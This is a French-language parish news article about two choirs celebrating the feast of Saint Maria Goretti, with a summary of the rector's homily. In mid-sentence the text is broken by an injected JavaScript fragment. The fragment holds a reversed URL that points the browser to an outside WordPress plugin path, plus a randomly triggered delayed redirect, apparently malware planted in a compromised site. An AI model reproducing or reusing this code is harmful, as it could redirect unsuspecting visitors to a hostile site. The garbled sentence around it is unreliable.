C’est vêtu de leurs uniformes (tuniques blanches brodées de bleu) et dans une joie immense que les membres de la Chorale Sainte Maria Goretti et ceux de la Chorale Pueri Cantores Sainte Maria Goretti ont célébré leur fête patronale Mercredi, le 06 juillet 2022 dans la messe du soir au Sanctuaire de la Paix et de la Réconciliation de Mont Sion Gikungu. La messe a été célébrée par le Recteur du Sanctuaire, Père Longin NTIRANYIBAGIRA.
Dès l’ouverture de la célébration eucharistique, le Père NTIRANYIBAGIRA a invité les membres de la chorale à rendre témoignage au Christ à l’instar de leur sainte Patronne.
Dans son homélie, il est revenu en insistant sur le fait que pour rendre témoignage au Christ il faut d’abord connaître le Christ. Il a aussi indiqué que la puissance de Dieu se manifeste dans nos faiblesses faisant ainsi occurrence à la manifestation de cette puissance divine à travers sainte Maria Goretti une fillette de 12 ans qui, malgré son jeune âge n’a pas eu peur de repousser un jeune homme de 18 ans qui voulait la pousser dans le péché. En continuant sur cela il a souligné que sainte Maria Goretti venait de recevoir la première Communion lorsqu’elle accepta, au péril de sa vie, de résister à la tentation ; cela pour démontrer que la force qui animait cette fillette native de Corinaltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do en Italie venait du sacrement qu’elle venait de recevoir, celui de l’Eucharistie. Il ainsi demandé aux choristes à prendre conscience de ce qu’est réellement la Sainte Communion – pour ceux qui l’ont déjà reçue – afin de mieux rendre un témoignage vivant du Christ. Le Père Longin a aussi mis en lumière les expressions « Ntaco et Ntakundi » qui permettent de petites libertés. Il les a interpellés à les bannir de leur langage car à chaque fois, ils sont utilisés pour commettre des péchés et outrepasser consciemment la loi de Dieu.
Continuant sa prédication du jour, le célébrant, se référant à l’Evangile du jour tiré de l’Evangile selon Saint Matthieu (10, 1-7) dans lequel Jésus appela ses disciples, a demandé aux choristes des deux chorales de suivre l’exemple des disciples de Jésus c’est-à-dire rendre service à l’Evangile de Jésus Christ sans toutefois attendre des intérêts comme Judas Iscariote. Les interpellant sur le fait que chacun d’eux a un talent respectif à faire valoir – raison pour laquelle tous les membres de la Chorale ne chantent pas la même voix -, le Père NTIRANYIBAGIRA a demandé aux choristes de faire leur apostolat sans intérêt mais pour la gloire de Dieu et afin aussi d’aider les autres par leurs services en leur disant : « La dignité de la personne humaine se trouve dans sa capacité de rendre les autres heureux par son service »
Clôturant son homélie, le P. Longin a rappelé aux choristes la joie qu’a ressenti la mère de Maria Goretti le jour de sa Canonisation, les invitant ainsi à poser des actes qui rendraient leurs parents fiers et heureux.
César & Idan